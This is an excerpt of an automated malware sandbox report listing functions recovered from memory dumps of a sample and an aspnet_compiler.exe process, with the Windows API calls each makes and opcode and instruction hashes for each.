Uniqueness Score: -1.00%

Function 00E46408 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00E4648E

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 415850d8d89522b97897e77c33650649d4d150876d3ec508bc8e34f624f2d247
Instruction ID: 8a31e8e0616f636f508869fed1447b91ea60c15eaab402112e51ea79823c7568
Opcode Fuzzy Hash: 415850d8d89522b97897e77c33650649d4d150876d3ec508bc8e34f624f2d247
Instruction Fuzzy Hash: 1A31B8B5D042189FCB10CFA9E884ADEFBF0EB59324F14901AE829B3210C335A9058FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E4430C Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00E4648E

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e4b32f195b394acc1663dcca8ea3cfcf9016939c7d7c2a318857f96c49c8e05a
Instruction ID: 233f398671349b1b4f7a7603a37cced040299d7a8bf1ea4d9c4f880008e0fd6e
Opcode Fuzzy Hash: e4b32f195b394acc1663dcca8ea3cfcf9016939c7d7c2a318857f96c49c8e05a
Instruction Fuzzy Hash: 753198B4D042189FCF10CFA9E484ADEFBF4AB49324F14902AE919B3300D374A9458FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E4A1EB Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00E4A266

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 24dec4634162f9a50c3d8de35e4c392fb97c58e1881ce1d33a14c7db426d2d46
Instruction ID: dfd4edadc1fb9415c44f40ea1cce9a387079705d5c0b38f1bc00cbf34431b122
Opcode Fuzzy Hash: 24dec4634162f9a50c3d8de35e4c392fb97c58e1881ce1d33a14c7db426d2d46
Instruction Fuzzy Hash: 1F2197B9D042089FCB10CFA9D884ADEFBF4AB59324F14906AE819B7310D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E4A1F0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00E4A266

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b9f55bd2d63bb6825f729df270268bca167ca6053eb928bf4a610c648f4f5b5e
Instruction ID: 7451604cf154d2c35099e66e8f03e76bff6ddc02add2a9285eb94d913affcf99
Opcode Fuzzy Hash: b9f55bd2d63bb6825f729df270268bca167ca6053eb928bf4a610c648f4f5b5e
Instruction Fuzzy Hash: AE2188B9D042189FCF10CFA9D484ADEFBF4AB59324F14902AE819B7310D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DED4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317583327.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ded000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e13033f34f2b8e742f5f5fe9f76054d4c4c48628eb4081145fbe8252659fc136
Instruction ID: 6497848e3801154880513cb399b3a8523c9f1f99f704a087bc97f168f9519f3b
Opcode Fuzzy Hash: e13033f34f2b8e742f5f5fe9f76054d4c4c48628eb4081145fbe8252659fc136
Instruction Fuzzy Hash: 262125B1504284DFDB04EF10D9C0B26BB66FB98328F24856DE9054B25AC736DC46CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00DED3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317583327.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ded000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b12b5b028144015e0762cc5c6845eab7b4c72b56a3b50a1e7c979a62194e915
Instruction ID: e5f4fa9532a72e91978a4e518d3acfec1b407caad1b0112fc3d81f3f5635eaac
Opcode Fuzzy Hash: 9b12b5b028144015e0762cc5c6845eab7b4c72b56a3b50a1e7c979a62194e915
Instruction Fuzzy Hash: 402128B1504284DFDB05EF10D9C0F26BB66FBA4324F24C56DE9494B286C736E846C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00DFD01C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317601658.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dfd000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21d1d2e12669604a7c3284d8247fa81286d64dfc0bd563eca7cc58e19bd35a82
Instruction ID: d5d0da515d9d2595a70222d2549b5286bc0f53397f220afb45364cc345addb72
Opcode Fuzzy Hash: 21d1d2e12669604a7c3284d8247fa81286d64dfc0bd563eca7cc58e19bd35a82
Instruction Fuzzy Hash: 2D21DEB16082489FDB14DF20C5C4B26BBA7EB84318F25C56DEA4A4B242CB36D846C662

Uniqueness

Uniqueness Score: -1.00%

Function 00DFD005 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317601658.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dfd000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516859a44fd97f6aa659a2d0e37f12b569c90a9e393d6266c8e8bfcadf8dce9d
Instruction ID: f46e62008c544da1545f3792140a3238c9deefa8185107db09d0234a0a559145
Opcode Fuzzy Hash: 516859a44fd97f6aa659a2d0e37f12b569c90a9e393d6266c8e8bfcadf8dce9d
Instruction Fuzzy Hash: B421C3755093C48FC702CF20C994B15BF72EB46314F29C6EBD8498B693C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00DED4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317583327.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ded000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
Instruction ID: d45b7668b86517def3433d81c24aef40ed4f55a6d8b5b75e6b2dcdcd2ffc0511
Opcode Fuzzy Hash: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
Instruction Fuzzy Hash: 1411D376404280DFCB15DF10D9C4B16BF72FB99328F28C6A9D8094B656C33AD856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DED3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317583327.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ded000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
Instruction ID: f38b32f5320f4031fbffcc6d311f5e1d87f047dadf029379359de6c7bd7079b4
Opcode Fuzzy Hash: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
Instruction Fuzzy Hash: 7911D376404280DFCB05DF10D5C4B16BF72FBA4324F28C6A9D8494B656C33AE856CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E45C60 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e035ca0b5ccb6a1d086a88c403c1a93213e8060c21a5aec247efc5e4feff39be
Instruction ID: 4079773ef644a13e7030a7a155c52910cf76df3ce1eaf7197125b0bd1d0a576f
Opcode Fuzzy Hash: e035ca0b5ccb6a1d086a88c403c1a93213e8060c21a5aec247efc5e4feff39be
Instruction Fuzzy Hash: F2510071D043189FDB14CFA9D888BAEBBB1BF49304F10912AE405BB251DB749945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00E442DC Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80d5ff7fa23b0dbced2902c2a3d11c00baa5e26e487584ecf66741d7d8836022
Instruction ID: 8b3ce10a15bd21d5a91c886badad7d4533bf648e7b2a0d4fc2c17ba88f987d2a
Opcode Fuzzy Hash: 80d5ff7fa23b0dbced2902c2a3d11c00baa5e26e487584ecf66741d7d8836022
Instruction Fuzzy Hash: 4E510EB1D042189FDB14CFA9D888BAEBBB1FF49304F10912AE805BB391DB749845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E464DC Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ca57e052293ac65fa248d35a09368cf4c3a8c79e2a2faa07db19c2075db959
Instruction ID: fbe253106f16e371b7f23563bdff08e34bc7ad9fcf263cf5bfa088d5583dff8b
Opcode Fuzzy Hash: f0ca57e052293ac65fa248d35a09368cf4c3a8c79e2a2faa07db19c2075db959
Instruction Fuzzy Hash: A45101B0D042588FDF14CFA9D894BDEBBB1BB4A304F14952EE405BB254DB74984ACF42

Uniqueness

Uniqueness Score: -1.00%

Function 00E4610C Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593217ace5185cc489165563c3f405ed4fd7ee4c2050e5b52daddbc38360f99f
Instruction ID: fa152e903ff3e7c1f99cded05cbaf810b576870167c6ca8a6dca2aea20cfb493
Opcode Fuzzy Hash: 593217ace5185cc489165563c3f405ed4fd7ee4c2050e5b52daddbc38360f99f
Instruction Fuzzy Hash: 075100B0D042189FCB14CFA9D884BDDBBB2BF4A308F10912AE855BB361DB749846CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00E44300 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75cae304106c99491445bf3d092d244845a7628bcbac12bb6513664cd563d446
Instruction ID: 427b409d9a4695958f4c5c30e720ea5fc712727001911d73a0509d0779d14a9e
Opcode Fuzzy Hash: 75cae304106c99491445bf3d092d244845a7628bcbac12bb6513664cd563d446
Instruction Fuzzy Hash: 1651E2B0D042189FDB14DFA9D884BDDBBB2FB4A308F109129E815BB351DB749845CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00E44318 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6445ede6b28acae2398b05b143af737b908fbba118d86d920e3a3bd670c640c
Instruction ID: 3210bc19a5f485d6c350a386ec767876a537c4ab9b4e419b22b2bdef67fe70bf
Opcode Fuzzy Hash: e6445ede6b28acae2398b05b143af737b908fbba118d86d920e3a3bd670c640c
Instruction Fuzzy Hash: 2D51EFB0D042189FDF14DFA9D884BEEBBB2BB4A304F10912AE415BB354DB749845CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00E430E0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a69c85207fe596e2873bbc5ee6f450ee4df687151cc8d981ba45e5b9bd64c97
Instruction ID: a4a361e8f380e970c767c07d3d945064185e4ade3d3a147afbfedaed4c6f2ac5
Opcode Fuzzy Hash: 8a69c85207fe596e2873bbc5ee6f450ee4df687151cc8d981ba45e5b9bd64c97
Instruction Fuzzy Hash: 8F0180B4D01209DFCB40DFA9D5446AEBBF0FB09304F2091AAD818B7350E3305B41CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: aspnet_compiler.exePID: 1592, Parent PID: 780COMMON

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	36
Total number of Limit Nodes:	0

Executed Functions

Function 0620B41D Relevance: 1.6, APIs: 1, Instructions: 95
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0620B4F2

Memory Dump Source

Source File: 00000001.00000002.436489154.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6200000_aspnet_compiler.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5e2e3568d90b5bd179642b43b9df5761196cf6fe0d21097582088c5214279fef
Instruction ID: 2e39c070bb342013d796bff4d767f31a1dd865cc992dc8e012b9f180f05b0d81
Opcode Fuzzy Hash: 5e2e3568d90b5bd179642b43b9df5761196cf6fe0d21097582088c5214279fef
Instruction Fuzzy Hash: CA3188B4D202499FDB60CFA8C895BDEBFB5FB08304F008129E805A7381D7759845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06208AE8 Relevance: 1.6, APIs: 1, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0620B4F2

Memory Dump Source

Source File: 00000001.00000002.436489154.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6200000_aspnet_compiler.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: caebe652929d1889978c7c30960bc639a9801bdac18fc094a875440b1c65a38b
Instruction ID: 744f30b15df3d9febea36d0189f07bd629d0eb94c95b2d5a00cc69c555184dd3
Opcode Fuzzy Hash: caebe652929d1889978c7c30960bc639a9801bdac18fc094a875440b1c65a38b
Instruction Fuzzy Hash: 2C3175B4D202499FEB64CFA8C895BAEBBF1FB08314F008129E815E7381D7799845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 062047CA Relevance: 1.6, APIs: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E28,?,?,062045D6), ref: 06204786

Memory Dump Source

Source File: 00000001.00000002.436489154.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6200000_aspnet_compiler.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a1cc680f29d29a54f3fa6c483d35ffbaf97bcd81bda332d7bd1c02d5325c4754
Instruction ID: 35c4fa2f3dff3ead95d6c6b784b43a022bd05da8bd60802eb557740d3c550ac1
Opcode Fuzzy Hash: a1cc680f29d29a54f3fa6c483d35ffbaf97bcd81bda332d7bd1c02d5325c4754
Instruction Fuzzy Hash: 1F2139B6D00249CFDB20DF9AD484BDEBBF4EB48324F14841AD659A7641D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06204718 Relevance: 1.6, APIs: 1, Instructions: 53
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E28,?,?,062045D6), ref: 06204786

Memory Dump Source

Source File: 00000001.00000002.436489154.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6200000_aspnet_compiler.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0d951a9e294b843bd70a3b75f7e2cb7ccd68806d14b54b912efc3e27768d911c
Instruction ID: 7b9e710a79e450fdb79bc97cf178fb9059b1b50aae12a721b6a3ca621a883cbe
Opcode Fuzzy Hash: 0d951a9e294b843bd70a3b75f7e2cb7ccd68806d14b54b912efc3e27768d911c
Instruction Fuzzy Hash: 101156B5C003498FCB10DF9AC844BDEFBF8AB89324F05851AD529BB250C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 062040B8 Relevance: 1.6, APIs: 1, Instructions: 53
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E28,?,?,062045D6), ref: 06204786

Memory Dump Source

Source File: 00000001.00000002.436489154.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6200000_aspnet_compiler.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4323c817bef656291763c37991ee596fd97587d9877a3d1b66b72537e83286c9
Instruction ID: 996a9a2981d4b6385e2ef6fad5a52cbd3c9ce8da768d2062b16dc4e0fb662364
Opcode Fuzzy Hash: 4323c817bef656291763c37991ee596fd97587d9877a3d1b66b72537e83286c9
Instruction Fuzzy Hash: FC1142B2C00249CFDB10DF9AC444B9EFBF8EB89224F05841AD919BB210D378A905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E208E0 Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 02E20947

Memory Dump Source

Source File: 00000001.00000002.414510114.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e20000_aspnet_compiler.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 803f72afc9d647e738cad0f3f62d36e96900efcda2c131eee2603494470892c6
Instruction ID: 84fadff4de9875b4b70ff53a8d46db4f6e6b324535f092a3d15265e3136927e3
Opcode Fuzzy Hash: 803f72afc9d647e738cad0f3f62d36e96900efcda2c131eee2603494470892c6
Instruction Fuzzy Hash: 85115B75D042598FDB10DFAAC5447DFBBF0AB98228F14841AC01AB7640C735A948CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 02E208E8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 02E20947

Memory Dump Source

Source File: 00000001.00000002.414510114.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e20000_aspnet_compiler.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 2c4b568c47472558a792cbd38583b89de6141b121bc3d8ff4e47c76736a50085
Instruction ID: 7d204657df586f9336b7484782218657daf36b18fa0445c46527bba1bdc6d881
Opcode Fuzzy Hash: 2c4b568c47472558a792cbd38583b89de6141b121bc3d8ff4e47c76736a50085
Instruction Fuzzy Hash: 4E113671D042498FDB10DFAAC444BDFBBF4AB88228F14841AC11AB7640CB39A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012CD508 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413890248.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12cd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e43ec29be1ceeb5a12c74ac1ff364b31d88755a4a541922e1038420b87db65
Instruction ID: 2b06bcfdf63e2b838da303c7d6bed8a54d84b75cfab939c81eb160518a113061
Opcode Fuzzy Hash: 24e43ec29be1ceeb5a12c74ac1ff364b31d88755a4a541922e1038420b87db65
Instruction Fuzzy Hash: E22136B1514248DFDB05CF54E9C0B26BB65FB98768F24867CEA054B206C336D806C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 012CD240 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413890248.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12cd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081736a0c3ec25fe2ad008de4c3d936104a12bc212c58ddfa451f9a008545aea
Instruction ID: dc72bc4b08ed606bb0353a38b22a8698d3bd1ed471ce652dcdeff60fc9c3e7af
Opcode Fuzzy Hash: 081736a0c3ec25fe2ad008de4c3d936104a12bc212c58ddfa451f9a008545aea
Instruction Fuzzy Hash: AA2121B1514249DFDB05CF94C9C0B26BF62FB88724F24867DEA054B207C336D806CAE2

Uniqueness

Uniqueness Score: -1.00%

Function 012DD4A4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413955135.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12dd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca971299ef3ba4e092dff630b7cc664746d0e7337bb33188d8cf9a6ec4f02cb2
Instruction ID: 1b367a25ec6ec2e29205bd0c5a1e6b3ebb79b0f5bd258f98c32c67e4e0ace2f0
Opcode Fuzzy Hash: ca971299ef3ba4e092dff630b7cc664746d0e7337bb33188d8cf9a6ec4f02cb2
Instruction Fuzzy Hash: 7C2149B1514648EFDB05CF64D4C0F26BB65FB84318F24C56DEA0A4B292C376E805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012DD2F4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413955135.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12dd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa4d61f6f89a1fea4d24f38c1df95ba7a684e25ef1e9985c6742c5e1ef5072f8
Instruction ID: f0e2f993537f9a720c10004a2777cc93cc9ce9fcbf61d8403093e0cf52ed7637
Opcode Fuzzy Hash: aa4d61f6f89a1fea4d24f38c1df95ba7a684e25ef1e9985c6742c5e1ef5072f8
Instruction Fuzzy Hash: 492168B1614648EFDB41CF94D8C0B2ABB65FB84324F24C56DE9094B286C77AD806CEA1

Uniqueness

Uniqueness Score: -1.00%

Function 012CD23B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413890248.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12cd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
Instruction ID: 06d5a3be24835992f2e12d396e5e9faf6de7729897ed4a1f93b09e07a2e5f9e5
Opcode Fuzzy Hash: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
Instruction Fuzzy Hash: 7C11CD72404285CFCB12CF54D9C0B16BF72FB88320F2886ADDA054B617C336D456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 012CD503 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413890248.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12cd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
Instruction ID: 7ee7f2ae5ee4128a6bbe16a0e5e394bfa4a5e492828ae6071826e2b3915a90b7
Opcode Fuzzy Hash: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
Instruction Fuzzy Hash: 5B11E176504284DFCB02CF14D5C0B16BF72FB98324F2886ADDA054B656C33AD45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012DD2EF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413955135.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12dd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aefa203dc648b68367d5eadaf217ffc8ec1cbf43e0532cdde5e0ce4ec521bc49
Instruction ID: f62195f3227688191046068d05d5693964fb04febcc90e56eed6785f03f917e2
Opcode Fuzzy Hash: aefa203dc648b68367d5eadaf217ffc8ec1cbf43e0532cdde5e0ce4ec521bc49
Instruction Fuzzy Hash: 0B119D76504684DFDB12CF14D5C4B19BB71FB84324F28C6AAD9494B686C33AD44ACFA2

Uniqueness

Uniqueness Score: -1.00%

Function 012DD49F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413955135.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12dd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe9a0dd81ef1aaa8884096262e193c6d7ada8b10660d0bdcffad81c4736878b9
Instruction ID: d056642f473004db601382749d1307e31fe523a6133627d6319e9c2bd16dba29
Opcode Fuzzy Hash: fe9a0dd81ef1aaa8884096262e193c6d7ada8b10660d0bdcffad81c4736878b9
Instruction Fuzzy Hash: 5011DD75904684DFCB12CF18D5C4B15BFB1FB84328F28C6AED9494B696C33AD44ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 012CDA8D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413890248.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12cd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 043e9d04acbc8e2d2ca2bc09818034256cf650a1877a73f2561d0d450ba608a8
Instruction ID: b74467a64c3ac688ea1a7dc414fcfe79ecb21fdc82ec62d36c4bdb729ddc1dcd
Opcode Fuzzy Hash: 043e9d04acbc8e2d2ca2bc09818034256cf650a1877a73f2561d0d450ba608a8
